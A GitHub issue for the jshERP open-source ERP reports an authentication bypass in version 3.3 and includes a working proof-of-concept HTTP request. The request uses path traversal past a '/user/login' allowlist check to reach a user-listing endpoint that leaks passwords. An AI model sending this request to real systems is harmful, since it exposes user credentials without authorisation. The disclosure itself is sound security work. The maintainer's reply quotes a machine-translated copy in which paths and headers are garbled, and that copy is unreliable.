search

jishenghua / jshERP

管伊佳ERP(原名华夏ERP)基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。
https://www.gyjerp.com
GNU General Public License v3.0
3.17k stars 1.15k forks source link

There is an Incorrect Access Control vulnerability in jshERP V3.3 that lead to the leakage of sensitive information in the backend system #98

Open aoaoaoe opened 10 months ago

aoaoaoe commented 10 months ago

1.The affected source code file is src/main/java/com/jsh/erp/filter/LogCostFilter.java,and the affected function is doFilter.

In the filter code, use servletRequest.getRequestURI() to obtain the request path, and then determine whether the path contains /doc.html, /user/login, /user/register. If so, execute chain.doFilter(request, response) to skip this filter. Else, continue to check.

Then determine whether the path startswith allowUrls. If so, execute chain.doFilter(request, response) to skip this filter.

See the screenshot below for the value of allowUrls 图片 图片

2.The problem lies in using servletRequest.getRequestURI() to obtain the request path. The path obtained by this function will not parse special symbols, but will be passed on directly, so you can use ../ to bypass it. Taking one of the backend interfaces /jshERP-boot/user/getAllList as an example, using /user/login/../../jshERP-boot/user/getAllList can make it satisfy requestUrl.contains("/user/login" ), and at the same time, it can request the getAllList interface to achieve login bypass.

3.The Poc is as follows:

GET /user/login/../../jshERP-boot/user/getAllList HTTP/1.1
Host: 192.168.124.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

When accessing the /jshERP-boot/user/getAllList interface directly, it will return "loginOut". 图片

When accessing the /user/login/../../jshERP-boot/user/getAllList interface, the user information can be obtained by bypassing the access control,whice also includes user passwords. 图片

jishenghua commented 10 months ago

好的, 明白了

------------------ 原始邮件 ------------------ 发件人: @.>; 发送时间: 2023年11月14日(星期二) 晚上11:18 收件人: @.>; 抄送: @.***>; 主题: [jishenghua/jshERP] There is an Incorrect Access Control vulnerability in jshERP V3.3 that lead to the leakage of sensitive information in the backend system (Issue #98)

1.受影响的源代码文件是src/main/java/com/jsh/erp/filter/LogCostFilter.java,而受影响的函数是doFilter.

在过滤器代码中,使用使用servletRequest.getRequestURI()来获取请求路径,然后确定该路径是否包含/doc.html,/用户/登录,/用户/寄存器.如果是这样,执行过滤器(请求、响应)来跳过这个过滤器。其他的,继续检查。

然后确定路径是否以allowUrls.如果是这样,执行过滤器(请求、响应)来跳过这个过滤器。

值见下面的截图allowUrls

2.问题在于使用使用servletRequest.getRequestURI()来获取请求路径。这个函数获得的路径不会解析特殊符号,而是会直接传递下去,所以你可以使用../来绕过它。将其中一个后端接口/用户名/getAllList为例,使用/user/登录/.././jshERP-boot/user/getAllList能使之满足请输入您的用户名和密码:,与此同时,它还可以请求获取全部列表接口,实现登录旁路。

3.规则如下: 用户名/用户名/jshERP-引导/用户/getAllListHTTP/1.1主机:用户代理:Mozilla/5.0(Windows NT操作系统WIN 64;x64;远程访问:109.0)壁虎/20100101Firefox浏览器/116.0接受:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/Webp ,/; q =0.8接受语言:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:连接:关闭升级-安全-请求:1 在访问/用户名/getAllList接口,它将返回“loginOut”。

在访问/user/登录/.././jshERP-boot/user/getAllList接口,可以绕过访问控制获取用户信息,其中还包括用户密码。

- 直接回复这封邮件,在GitHub上查看,或取消订阅. 您收到此消息是因为您订阅了此线程。消息ID:<吉盛华/ js herp /问题/ @.***和>